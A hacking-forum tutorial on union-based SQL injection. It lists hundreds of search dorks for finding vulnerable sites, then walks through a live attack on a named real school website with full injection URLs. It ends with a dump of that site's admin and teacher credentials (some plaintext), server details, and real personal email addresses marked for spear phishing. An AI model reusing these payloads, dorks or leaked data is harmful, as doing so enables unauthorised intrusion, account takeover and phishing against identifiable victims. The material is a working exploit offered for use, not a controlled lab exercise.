Welcome Guest, Not a member yet? Create Account  

SQL Injection [Union Based]
#1
(This post was last modified: 08-16-2017, 07:50 PM by Mike.)

[Image: DAISUKEE.png] 
"Daisuke's katana can slay any security" 
==========================
 
 
SQL Injection Union Based (Tutorial with screens)

 
0x00FFF#~ Summary 
0x1 - Introduction 
0x2 - Attack 
0x3 - Links 
0x4 - Credits & Authors

 
 
0x1#~ Introduction 
 
# What is SQL Injection? 
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database 
 
[?] Info: 
- It's a flaw in the web application,not the database, or the server. 
- Can be injected into: Cookies, Forms, and URL parameters.

 
(What are Cookies ? http://en.wikipedia.org/wiki/HTTP_cookie
Spoiler Show
[Image: mcdonalds-Chocolate-Chip-Cookie.png]LULZ
 
# Why UNION? 
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables.  
 
0x2#~ Attack 
 
# Here is a list of d0rks to find SQL vulnerabilities: 
A lot of these sites are already being hacked by other hackers but it's useful for training ! 
Code:
 
inurl:index.php?id= 
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID= 
inurllay_old.php?id= 
inurl:declaration_more.php?decl_id= 
inurlageid= 
inurl:games.php?id= 
inurlage.php?file= 
inurl:newsDetail.php?id= 
inurl:gallery.php?id=d= 
inurl:event.php?id= 
inurlroduct-item.php?id= 
inurl:sql.php?id= 
inurl:news_view.php?id= 
inurl:select_biblio.php?id= 
inurl:humor.php?id= 
inurl:aboutbook.php?id= 
inurl:fiche_spectacle.php?id= 
inurl:article.php?id= 
inurl:show.php?id= 
inurl:staff_id= 
inurl:newsitem.php?num= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:historialeer.php?num= 
inurl:reagir.php?num= 
inurltray-Questions-View.php?num= 
inurl:forum_bds.php?num= 
inurl:game.php?id= 
inurl:view_product.php?id= 
inurl:newsone.php?id= 
inurl:sw_comment.php?id= 
inurl:news.php?id= 
inurl:avd_start.php?av 
inurl:communique_detail.php?id= 
inurl:sem.php3?id= 
inurl:kategorie.php4?id= 
inurl:news.php?id= 
inurl:index.php?id= 
inurl:faq2.php?id= 
inurl:show_an.php?id= 
inurlreview.php?id= 
inurl:loadpsb.php?id= 
inurlpinions.php?id= 
inurl:spr.php?id= 
inurlages.php?id= 
inurl:announce.php?id= 
inurl:clanek.php4?id= 
inurlarticipant.php?id= 
inurl:download.php?id= 
inurl:main.php?id= 
inurl:review.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurlrod_detail.php?id= 
inurl:viewphoto.php?id= 
inurl:article.php?id= 
inurlerson.php?id= 
inurlroductinfo.php?id= 
inurl:showimg.php?id= 
inurl:view.php?id= 
inurl:website.php?id= 
inurl:hosting_info.php?id= 
inurl:gallery.php?id= 
inurl:rub.php?idr= 
inurl:view_faq.php?id= 
inurl:artikelinfo.php?id= 
inurl:detail.php?ID= 
inurl:index.php?= 
inurlrofile_view.php?id= 
inurl:category.php?id= 
inurlublications.php?id= 
inurl:fellows.php?id= 
inurl:downloads_info.php?id= 
inurlrod_info.php?id= 
inurl:shop.php?do=part&id= 
inurlroductinfo.php?id= 
inurl:collectionitem.php?id= 
inurl:band_info.php?id= 
inurlroduct.php?id= 
inurl:releases.php?id= 
inurl:ray.php?id= 
inurlroduit.php?id= 
inurlop.php?id= 
inurl:shopping.php?id= 
inurlroductdetail.php?id= 
inurlost.php?id= 
inurl:viewshowdetail.php?id= 
inurl:clubpage.php?id= 
inurl:memberInfo.php?id= 
inurl:section.php?id= 
inurl:theme.php?id= 
inurlage.php?id= 
inurl:shredder-categories.php?id= 
inurl:tradeCategory.php?id= 
inurlroduct_ranges_view.php?ID= 
inurl:shop_category.php?id= 
inurl:tran******.php?id= 
inurl:channel_id= 
inurl:item_id= 
inurl:newsid= 
inurl:trainers.php?id= 
inurl:news-full.php?id= 
inurl:news_display.php?getid= 
inurl:index2.php?option= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:newsone.php?id= 
inurl:event.php?id= 
inurlroduct-item.php?id= 
inurl:sql.php?id= 
inurl:aboutbook.php?id= 
inurl:review.php?id= 
inurl:loadpsb.php?id= 
inurl:ages.php?id= 
inurl:material.php?id= 
inurl:clanek.php4?id= 
inurl:announce.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:viewapp.php?id= 
inurl:viewphoto.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:review.php?id= 
inurl:iniziativa.php?in= 
inurl:curriculum.php?id= 
inurl:labels.php?id= 
inurl:story.php?id= 
inurl:look.php?ID= 
inurl:newsone.php?id= 
inurl:aboutbook.php?id= 
inurl:material.php?id= 
inurlpinions.php?id= 
inurl:announce.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:tekst.php?idt= 
inurl:newscat.php?id= 
inurl:newsticker_info.php?idn= 
inurl:rubrika.php?idr= 
inurl:rubp.php?idr= 
inurlffer.php?idf= 
inurl:art.php?idm= 
inurl:title.php?id= 
inur l: info.php?id= 
inurl : pro.php?id= 
inurl:index.php?id= 
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID= 
inurllay_old.php?id= 
inurl:declaration_more.php?decl_id= 
inurlageid= 
inurl:games.php?id= 
inurlage.php?file= 
inurl:newsDetail.php?id= 
inurl:gallery.php?id= 
inurl:article.php?id= 
inurl:show.php?id= 
inurl:staff_id= 
inurl:newsitem.php?num= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:historialeer.php?num= 
inurl:reagir.php?num= 
inurltray-Questions-View.php?num= 
inurl:forum_bds.php?num= 
inurl:game.php?id= 
inurl:view_product.php?id= 
inurl:newsone.php?id= 
inurl:sw_comment.php?id= 
inurl:news.php?id= 
inurl:avd_start.php?avd= 
inurl:event.php?id= 
inurlroduct-item.php?id= 
inurl:sql.php?id= 
inurl:news_view.php?id= 
inurl:select_biblio.php?id= 
inurl:humor.php?id= 
inurl:aboutbook.php?id= 
inurl:fiche_spectacle.php?id= 
inurl:communique_detail.php?id= 
inurl:sem.php3?id= 
inurl:kategorie.php4?id= 
inurl:news.php?id= 
inurl:index.php?id= 
inurl:faq2.php?id= 
inurl:show_an.php?id= 
inurlreview.php?id= 
inurl:loadpsb.php?id= 
inurlpinions.php?id= 
inurl:spr.php?id= 
inurlages.php?id= 
inurl:announce.php?id= 
inurl:clanek.php4?id= 
inurlarticipant.php?id= 
inurl:download.php?id= 
inurl:main.php?id= 
inurl:review.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurlrod_detail.php?id= 
inurl:viewphoto.php?id= 
inurl:article.php?id= 
inurlerson.php?id= 
inurlroductinfo.php?id= 
inurl:showimg.php?id= 
inurl:view.php?id= 
inurl:website.php?id= 
inurl:hosting_info.php?id= 
inurl:gallery.php?id= 
inurl:rub.php?idr= 
inurl:view_faq.php?id= 
inurl:artikelinfo.php?id= 
inurl:detail.php?ID= 
inurl:index.php?= 
inurlrofile_view.php?id= 
inurl:category.php?id= 
inurlublications.php?id= 
inurl:fellows.php?id= 
inurl:downloads_info.php?id= 
inurlrod_info.php?id= 
inurl:shop.php?do=part&id= 
inurlroductinfo.php?id= 
inurl:collectionitem.php?id= 
inurl:band_info.php?id= 
inurlroduct.php?id= 
inurl:releases.php?id= 
inurl:ray.php?id= 
inurlroduit.php?id= 
inurlop.php?id= 
inurl:shopping.php?id= 
inurlroductdetail.php?id= 
inurlost.php?id= 
inurl:viewshowdetail.php?id= 
inurl:clubpage.php?id= 
inurl:memberInfo.php?id= 
inurl:section.php?id= 
inurl:theme.php?id= 
inurlage.php?id= 
inurl:shredder-categories.php?id= 
inurl:tradeCategory.php?id= 
inurlroduct_ranges_view.php?ID= 
inurl:shop_category.php?id= 
inurl:tran******.php?id= 
inurl:channel_id= 
inurl:item_id= 
inurl:newsid= 
inurl:trainers.php?id= 
inurl:news-full.php?id= 
inurl:news_display.php?getid= 
inurl:index2.php?option= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:newsone.php?id= 
inurl:event.php?id= 
inurlroduct-item.php?id= 
inurl:sql.php?id= 
inurl:aboutbook.php?id= 
inurl:review.php?id= 
inurl:loadpsb.php?id= 
inurl:ages.php?id= 
inurl:material.php?id= 
inurl:clanek.php4?id= 
inurl:announce.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:viewapp.php?id= 
inurl:viewphoto.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:review.php?id= 
inurl:iniziativa.php?in= 
inurl:curriculum.php?id= 
inurl:labels.php?id= 
inurl:story.php?id= 
inurl:look.php?ID= 
inurl:newsone.php?id= 
inurl:aboutbook.php?id= 
inurl:material.php?id= 
inurlpinions.php?id= 
inurl:announce.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:tekst.php?idt= 
inurl:newscat.php?id= 
inurl:newsticker_info.php?idn= 
inurl:rubrika.php?idr= 
inurl:rubp.php?idr= 
inurlffer.php?idf= 
inurl:art.php?idm= 
inurl:title.php?id= 
inurl:shop+php?id+site:fr 
"inurl:admin.asp" 
"inurl:login/admin.asp" 
"inurl:admin/login.asp" 
"inurl:adminlogin.asp" 
"inurl:adminhome.asp" 
"inurl:admin_login.asp" 
"inurl:administratorlogin.asp" 
"inurl:login/administrator.asp" 
"inurl:administrator_login.asp" 
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() 
inurl:"id=" & intext:"Warning: mysql_fetch_array() 
inurl:"id=" & intext:"Warning: mysql_num_rows() 
inurl:"id=" & intext:"Warning: session_start() 
inurl:"id=" & intext:"Warning: getimagesize() 
inurl:"id=" & intext:"Warning: is_writable() 
inurl:"id=" & intext:"Warning: getimagesize() 
inurl:"id=" & intext:"Warning: Unknown() 
inurl:"id=" & intext:"Warning: session_start() 
inurl:"id=" & intext:"Warning: mysql_result() 
inurl:"id=" & intext:"Warning: pg_exec() 
inurl:"id=" & intext:"Warning: mysql_result() 
inurl:"id=" & intext:"Warning: mysql_num_rows() 
inurl:"id=" & intext:"Warning: mysql_query() 
inurl:"id=" & intext:"Warning: array_merge() 
inurl:"id=" & intext:"Warning: preg_match() 
inurl:"id=" & intext:"Warning: ilesize() 
inurl:"id=" & intext:"Warning: filesize() 
inurl:"id=" & intext:"Warning: require() 
inurl:index.php?id= 
inurl:trainers.php?id= 
inurl:login.asp 
index of:/admin/login.asp 
inurl:buy.php?category= 
inurl:article.php?ID= 
inurl:play_old.php?id= 
inurl:declaration_more.php?decl_id= 
inurl:pageid= 
inurl:games.php?id= 
inurl:page.php?file= 
inurl:newsDetail.php?id= 
inurl:gallery.php?id= 
inurl:article.php?id= 
inurl:show.php?id= 
inurl:staff_id= 
inurl:newsitem.php?num= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:historialeer.php?num= 
inurl:reagir.php?num= 
inurl:Stray-Questions-View.php?num= 
inurl:forum_bds.php?num= 
inurl:game.php?id= 
inurl:view_product.php?id= 
inurl:newsone.php?id= 
inurl:sw_comment.php?id= 
inurl:news.php?id= 
inurl:avd_start.php?avd= 
inurl:event.php?id= 
inurl:product-item.php?id= 
inurl:sql.php?id= 
inurl:news_view.php?id= 
inurl:select_biblio.php?id= 
inurl:humor.php?id= 
inurl:aboutbook.php?id= 
inurl:ogl_inet.php?ogl_id= 
inurl:fiche_spectacle.php?id= 
inurl:communique_detail.php?id= 
inurl:sem.php3?id= 
inurl:kategorie.php4?id= 
inurl:news.php?id= 
inurl:index.php?id= 
inurl:faq2.php?id= 
inurl:show_an.php?id= 
inurl:preview.php?id= 
inurl:loadpsb.php?id= 
inurl:opinions.php?id= 
inurl:spr.php?id= 
inurl:pages.php?id= 
inurl:announce.php?id= 
inurl:clanek.php4?id= 
inurl:participant.php?id= 
inurl:download.php?id= 
inurl:main.php?id= 
inurl:review.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:prod_detail.php?id= 
inurl:viewphoto.php?id= 
inurl:article.php?id= 
inurl:person.php?id= 
inurl:productinfo.php?id= 
inurl:showimg.php?id= 
inurl:view.php?id= 
inurl:website.php?id= 
inurl:hosting_info.php?id= 
inurl:gallery.php?id= 
inurl:rub.php?idr= 
inurl:view_faq.php?id= 
inurl:artikelinfo.php?id= 
inurl:detail.php?ID= 
inurl:index.php?= 
inurl:profile_view.php?id= 
inurl:category.php?id= 
inurl:publications.php?id= 
inurl:fellows.php?id= 
inurl:downloads_info.php?id= 
inurl:prod_info.php?id= 
inurl:shop.php?do=part&id= 
inurl:productinfo.php?id= 
inurl:collectionitem.php?id= 
inurl:band_info.php?id= 
inurl:product.php?id= 
inurl:releases.php?id= 
inurl:ray.php?id= 
inurl:produit.php?id= 
inurl:produit.php?id=+site:fr 
inurl:pop.php?id= 
inurl:shopping.php?id= 
inurl:productdetail.php?id= 
inurl:post.php?id= 
inurl:viewshowdetail.php?id= 
inurl:clubpage.php?id= 
inurl:memberInfo.php?id= 
inurl:section.php?id= 
inurl:theme.php?id= 
inurl:page.php?id= 
inurl:shredder-categories.php?id= 
inurl:tradeCategory.php?id= 
inurl:product_ranges_view.php?ID= 
inurl:shop_category.php?id= 
inurl:transcript.php?id= 
inurl:channel_id= 
inurl:item_id= 
inurl:newsid= 
inurl:trainers.php?id= 
inurl:news-full.php?id= 
inurl:news_display.php?getid= 
inurl:index2.php?option= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:newsone.php?id= 
inurl:event.php?id= 
inurl:product-item.php?id= 
inurl:sql.php?id= 
inurl:aboutbook.php?id= 
inurl:preview.php?id= 
inurl:loadpsb.php?id= 
inurl:pages.php?id= 
inurl:material.php?id= 
inurl:clanek.php4?id= 
inurl:announce.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:viewapp.php?id= 
inurl:viewphoto.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:review.php?id= 
inurl:iniziativa.php?in= 
inurl:curriculum.php?id= 
inurl:labels.php?id= 
inurl:story.php?id= 
inurl:look.php?ID= 
inurl:newsone.php?id= 
inurl:aboutbook.php?id= 
inurl:material.php?id= 
inurl:opinions.php?id= 
inurl:announce.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:tekst.php?idt= 
inurl:newscat.php?id= 
inurl:newsticker_info.php?idn= 
inurl:rubrika.php?idr= 
inurl:rubp.php?idr= 
inurl:offer.php?idf= 
inurl:art.php?idm= 
inurl:title.php?id= 
inurl:index.php?id= 
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID= 
inurllay_old.php?id= 
inurl:declaration_more.php?decl_id= 
inurlageid= 
inurl:games.php?id= 
inurlage.php?file= 
inurl:newsDetail.php?id= 
inurl:gallery.php?id= 
inurl:article.php?id= 
inurl:show.php?id= 
inurl:staff_id= 
inurl:newsitem.php?num= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:historialeer.php?num= 
inurl:reagir.php?num= 
inurltray-Questions-View.php?num= 
inurl:forum_bds.php?num= 
inurl:game.php?id= 
inurl:view_product.php?id= 
inurl:newsone.php?id= 
inurl:sw_comment.php?id= 
inurl:news.php?id= 
inurl:avd_start.php?avd= 
inurl:event.php?id= 
inurlroduct-item.php?id= 
inurl:sql.php?id= 
inurl:news_view.php?id= 
inurl:select_biblio.php?id= 
inurl:humor.php?id= 
inurl:aboutbook.php?id= 
inurl:fiche_spectacle.php?id= 
inurl:communique_detail.php?id= 
inurl:sem.php3?id= 
inurl:kategorie.php4?id= 
inurl:news.php?id= 
inurl:index.php?id= 
inurl:faq2.php?id= 
inurl:show_an.php?id= 
inurlreview.php?id= 
inurl:loadpsb.php?id= 
inurlpinions.php?id= 
inurl:spr.php?id= 
inurlages.php?id= 
inurl:announce.php?id= 
inurl:clanek.php4?id= 
inurlarticipant.php?id= 
inurl:download.php?id= 
inurl:main.php?id= 
inurl:review.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurlrod_detail.php?id= 
inurl:viewphoto.php?id= 
inurl:article.php?id= 
inurlerson.php?id= 
inurlroductinfo.php?id= 
inurl:showimg.php?id= 
inurl:view.php?id= 
inurl:website.php?id= 
inurl:hosting_info.php?id= 
inurl:gallery.php?id= 
inurl:rub.php?idr= 
inurl:view_faq.php?id= 
inurl:artikelinfo.php?id= 
inurl:detail.php?ID= 
inurl:index.php?= 
inurlrofile_view.php?id= 
inurl:category.php?id= 
inurlublications.php?id= 
inurl:fellows.php?id= 
inurl:downloads_info.php?id= 
inurlrod_info.php?id= 
inurl:shop.php?do=part&id= 
inurlroductinfo.php?id= 
inurl:collectionitem.php?id= 
inurl:band_info.php?id= 
inurlroduct.php?id= 
inurl:releases.php?id= 
inurl:ray.php?id= 
inurlroduit.php?id= 
inurlop.php?id= 
inurl:shopping.php?id= 
inurlroductdetail.php?id= 
inurlost.php?id= 
inurl:viewshowdetail.php?id= 
inurl:clubpage.php?id= 
inurl:memberInfo.php?id= 
inurl:section.php?id= 
inurl:theme.php?id= 
inurlage.php?id= 
inurl:shredder-categories.php?id= 
inurl:tradeCategory.php?id= 
inurlroduct_ranges_view.php?ID= 
inurl:shop_category.php?id= 
inurl:transcript.php?id= 
inurl:channel_id= 
inurl:item_id= 
inurl:newsid= 
inurl:trainers.php?id= 
inurl:news-full.php?id= 
inurl:news_display.php?getid= 
inurl:index2.php?option= 
inurl:readnews.php?id= 
inurl:top10.php?cat= 
inurl:newsone.php?id= 
inurl:event.php?id= 
inurlroduct-item.php?id= 
inurl:sql.php?id= 
inurl:aboutbook.php?id= 
inurl:review.php?id= 
inurl:loadpsb.php?id= 
inurl:ages.php?id= 
inurl:material.php?id= 
inurl:clanek.php4?id= 
inurl:announce.php?id= 
inurl:chappies.php?id= 
inurl:read.php?id= 
inurl:viewapp.php?id= 
inurl:viewphoto.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:review.php?id= 
inurl:iniziativa.php?in= 
inurl:curriculum.php?id= 
inurl:labels.php?id= 
inurl:story.php?id= 
inurl:look.php?ID= 
inurl:newsone.php?id= 
inurl:aboutbook.php?id= 
inurl:material.php?id= 
inurlpinions.php?id= 
inurl:announce.php?id= 
inurl:rub.php?idr= 
inurl:galeri_info.php?l= 
inurl:tekst.php?idt= 
inurl:newscat.php?id= 
inurl:newsticker_info.php?idn= 
inurl:rubrika.php?idr= 
inurl:rubp.php?idr= 
inurlffer.php?idf= 
inurl:art.php?idm= 
inurl:title.php?id= 
 
 
#------------------------------------------------------------------------------------+ 
| I have found a vulnerable website, i am not responsible of your damage. 
| I prefer make a tutorial on a real site to be in a real situation. 
#------------------------------------------------------------------------------------+ 
 
#[1] Find the vulnerable parameter 
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 (no error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92' (error)
 
"Why error ? i don't see any error message :s ???" 
It's normal, in this case the error is the blank page: 
Spoiler Show
[Image: iPfh7Uw.png]
 
 
#[2] Find the number of columns 
To get to the point, what we're about to do is find how many columns the website has using No Error/Error statements. 
 
Start by entering order by 100--
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 100-- (error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 50-- (error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 15-- (error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 10-- (error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 9-- (no error)
 
 
The page displays correctly, so there are 9 columns
Spoiler Show
[Image: F86KJsY.png]
 
 
#[3] Time to execute the UNION SELECT statement 
We have to select the 9 columns: 
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--
 
Wow, the number 4 appears, the 4th column is vulnerable to SQL injection and we'll extract the database from here: 
Spoiler Show
[Image: lCSZvNf.png]
 
 
#[4] Informations 
 
Now we know where to inject, you can reap some information about the database using: concat(the query()) 
 
Examples: 
- version() 
Spoiler Show
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(version()),5,6,7,8,9--
 
[Image: GzQpvav.png]
 
- @@datadir 
Spoiler Show
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,@@datadir,5,6,7,8,9--
 
[Image: cfrF1is.png]
 
- @@hostname 
Hmm I don't know why it doesn't work on this site :s 
 
- database() 
Spoiler Show
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT+1,2,3,concat(database()),5,6,7,8,9--
 
[Image: QFslYdF.png]
 
- user() 
Spoiler Show
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(user()),5,6,7,8,9--
 
[Image: Wg2XTzz.png]
 
-show all 
Spoiler Show
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(database(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,user()),5,6,7,8,9--
 
0x3c62723e = 0x<br> converted in Hex = 0x3c62723e 
[Image: qAa4dLp.png]
 
 
First let's look up some functions we're gonna use to extract table names (Important) 
Quote:group_concat = grouping up data to a specific statement 
table_name = tables names to be shown on screen 
from = location of a specified statement 
information_schema.tables = information in the database with table names in it 
table_schema = tables in a database 
database() = current database in the website 
0x0a = a Hex code that creates a new line for organizing tables in an order
 
 
#[5] Show all tables of the database
I apply the functions I mentioned 
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(table_name,0x0a),5,6,7,8,9 from information_schema.tables where table_schema=database()--
 
 
You should see this: 
Code:
allumni ,article ,attendance_setting ,banner ,banner_zone ,content ,course ,csv ,division ,events ,ex_student ,exam_desc ,exam_setting ,exam_subjtotal ,exam_type ,final_grading ,grace ,grade_subject ,grading ,groups ,lecture_attendance ,login ,login_admin ,magazines ,mrksht ,navigation ,news ,notice ,photo_category ,photo_details ,pictures ,school_accnt ,schooldays_total ,semester ,standard ,standard_desc ,stream_desc ,stud_history ,stud_score ,student ,student_admission ,student_attendance ,student_exam ,student_grace ,student_grade ,student_gradesubject ,student_subject ,student_ya ,student_yrassessment ,subject ,tags ,tb_excelupload ,tb_quicklinks ,tb_videos ,teacher ,teacher_classes ,teacher_sub_assign ,teacher_subjects ,template ,thoughtforday ,year_assessment ,year_desc
 
 
Wow, there are two interesting columns: login and login_admin ! Humm "admin" I love this kind of column :troll: 
Spoiler Show
[Image: zlIhpuG.png]
 
 
#[6] Extract data from columns 
 
'login' seems to be having users information stored in it. 
'login_admin' seems to be having admins information stored in it. 
 
To do this, we're gonna have to alter some queries a bit. Look closely at this syntax: 
Quote: 
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e-- 
 
 
We need to replace: 
table_name = replaced by "column_name
information_schema.tables = replaced by "information_schema.columns
table_schema = replaced by "table_name
database() = replaced by "0x6c6f67696e5f61646d696e--" (login_admin) 
 
To make a Hex readable, we put "0x" at the beginning. To enter that table using the syntax above, we have to convert that table name to Hex. If you are using the Firefox HackBar like me, you can do that: 
 
[Image: sfYjirc.png] 
 
And the result will be: 0x44616973756b65a 
 
[Image: ofq1KlS.png] 
 
Or: http://www.string-functions.com/hex-string.aspx 
 
So! After have launched the injection in the column login_admin, we have 4 columns: admin_id, usernme, passwrd, logtime 
Spoiler Show
[Image: MIyNZpo.png]
 
 
Let's look up some functions we replaced and know their uses. 
Quote:group_concat(column_name,0x0a) = grouping the column names we're going to extract 
information_schema.columns = column names stored in database 
table_name = extracting column from a specific table 
0xHEX_Code_Table = Specific table name converted to hex 
 
 
Results: 
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(admin_id,0x0a,passwrd,0x0a,logtime,0x0a,usernme,0x0a),5,6,7,8,9 from login_admin--
 
 
It show admin credentials: 
Spoiler Show
[table] 
    [row] 
        [cell]admin_id [/cell] 
        [cell]passwrd [/cell] 
        [cell]logtime [/cell] 
        [cell]usernme [/cell] 
    [/row] 
    [row] 
        [cell] 1[/cell] 
        [cell]3¢PÉÜœz;þß„mJ…  [/cell] 
        [cell]2014-02-11 01:25:09 [/cell] 
        [cell]admin [/cell] 
    [/row] 
[/table]  
 
[Image: JumnMiy.png]
 
 
You can try with the column that you want. I use the same injection for the column login 
 
Quote: 
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e--
 
 
[Image: WFma7bu.png] 
 
Then 
 
Quote: 
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(a_id,0x0a,aname,0x0a,apass,0x3c62723e),5,6,7,8,9 from login--
 
 
[Image: OHWS0B2.png] 
 
The final dump Smile 
Code:
 
 ____        _           _         
|  _ \  __ _(_)___ _   _| | _____  
| | | |/ _` | / __| | | | |/ / _ \ 
| |_| | (_| | \__ \ |_| |   <  __/ 
|____/ \__,_|_|___/\__,_|_|\_\___| 
            /\  The Hackers Bay | The Hackers Boat 
/vvvvvvvvvvvv \--------------------------------------, 
`^^^^^^^^^^^^ /=====================================" 
            \/ 
             
             
http://dbhspgoa.edu.in 
goaed_ucation 
5.0.37-standard 
/var/lib/mysql/ 
goaed_ucationu@72.35.83.36 
 
===============table admin================ 
admin_id, usernme, passwrd, logtime 
1 3¢PÉÜœz;þß„mJ… 2014-02-11 01:25:09 admin  
 
===============table login================ 
a_id ,aname ,apass ,logtime ,fullname ,atype ,t_status ,a_schid ,school_news ,school_attendance ,school_magazine ,school_marksht ,school_stud ,school_allum ,school_content ,school_daythought ,school_event ,school_nav ,school_ban ,school_photo ,school_art ,school_courses ,school_teacher ,school_grace ,school_report ,school_admission ,school_testimonial ,school_excelsheet  
 
1 admin admin 
,2 sanjeevh sanjeev 
,3 teacher1cc teacher1cc 
,4 teacher12gg teacher12gg 
,5 teacher122 teacher122 
,6 teacher100 teacher100 
,7 teacher155 teacher155 
,8 teacher177 teacher177 
,9 teacher277 teacher277 
,11 fragnel f2009 
,12 test M»`¹¾l‚L:­d)µ¦Á 
,13 donbosco De©«vý¹`MáúK 
,14 pccc2010 †ÉZ¶ºšb˜C$‹4-| 
,15 Roy W$÷_5g:¹ò@ÝÞ 
,16 Principal ¿¦o¹ƒ4º~ÂëÞʲP 
,17 francis ›Ùó ¹ÈìÕ'ꊡ¸†# 
,18 xavmartin ›Ùó ¹ÈìÕ'ꊡ¸†# 
,20 ishaniroy •¹òÄ xR¾–îƒSû³X 
,22 namdevg >y Œö÷Úèá’#qž 
,23 oscarn Ò² «5ÅÆl5B«ƒ3õc 
,24 soniyas ´oÀ7#ÆWâ²Ë“ðû 
,25 hclerk t/#`eó´©ýŠ†ê 
,29 satishsanvol .óÜ:¿#ÿ²£Á3cw 
,30 stmichael_e4r Ün‘šÆ‡H3«CÙS„- 
,31 test ص¦†õ%„p8B×€bYàÛ 
,32 test1 Ïf¥ÓeÜ9ê„š¨¬ó 
,33 zantye ¢ ååçêaGÿF0c]Ì 
 
================Misc================ 
Apache 1.3.41  
FrontPage/5.0.2.2510  
Apache module mod_perl/1.29 FrontPage/5.0.2.2510  
Mod SSL 2.8.31  
Open SSL 0.9.8b  
PHP 4.4.8  
 
Emails on dbhspgoa.edu.in (Spear phishing) 
shaunakdsilva@yahoo.com  
bhatimax@gmail.com  
raunaq.ep@gmail.com  
ikasrikant@hotmail.com  
francisloves01@yahoo.com  
rishiwrite@gmail.com  
reuben.rebelo@rediff.com  
mobypirate@hotmail.com  
avesh.mahagaokar@hotmail.com  
mak.man@live.com  
clint.rb@rediffmail.com  
principal@dbhspgoa.edu.in  
jnmoses2000@yahoo.com  
maheshverma124@gmail.com  
reube.rebelo@rediff.com  
yamuna.bepari@gmail.com  
ethanferns4@gmail.com  
greynomenezes@gmail.com  
anthonydcosta95@gmail.com  
edesa@yahoomail.com  
dboscopanjim@yahoo.co.in
 
 
____________________________________________________________ 
 
0x3#~ Links 
- http://hakipedia.com/index.php/SQL_Injection 
- http://hex.online-toolz.com/tools/text-h...vertor.php 
- https://www.owasp.org/index.php/XSS_Filt...heat_Sheet 
 
0x4#~ Credits & Authors 
Daisuke Dan - TheHackersBay 
Penetration testing, Research Team 
 
Have a nice day !



[Image: TQzc844.png]
Likes 0




  1 Guest(s)